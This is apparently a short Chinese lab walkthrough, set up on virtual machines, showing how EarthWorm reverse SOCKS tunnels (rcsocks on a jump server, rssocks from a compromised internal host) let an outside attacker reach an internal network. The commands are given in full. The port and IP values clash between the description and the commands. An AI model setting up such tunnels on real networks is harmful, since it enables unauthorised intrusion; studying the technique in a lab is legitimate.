场景2(这里所有主机都是虚拟机)
攻击者连接跳板机,内网跳板反弹连接到跳板机,内网跳板连接内网目标主机
场景描述:攻击者(192.168.1.10)位于外网,无法访问目标网络内部的主机。但是攻击者可以访问目标网络中对外暴露的服务器(192.168.1.34)。在目标网络中还有一台机器是被控制的,IP地址网卡一:192.168.1.22,IP地址网卡二:192.168.200.22,这台机器可以反弹连接到跳板机。
攻击链路:攻击者首先连接到跳板机,再连接到内网跳板,最后访问内网的目标机器(192.168.200.20··)。
由于网络转换问题,内网跳板机不能是NAT模式,而是使用桥接模式,只要内网跳板能访问到内网目标即可说明问题。
通过VM虚拟化软件实现场景搭建,网络模式和IP地址配置如下:
(1)跳板机上的操作
./ew -s rcsocks -l 6000 -e 7000
//添加转发隧道,将6000端口收到的代理请求转发给反连7000端口的主机
(2)内网跳板操作
.\ew -s rssocks -d 192.168.1.8 -e 8888
//内网跳板反弹连接到跳板机的8888端口
(3)攻击机器本机通过Proxifier或浏览器设置Socks5代理访问目标内网服务
方法一:Proxifier设置Socks5代理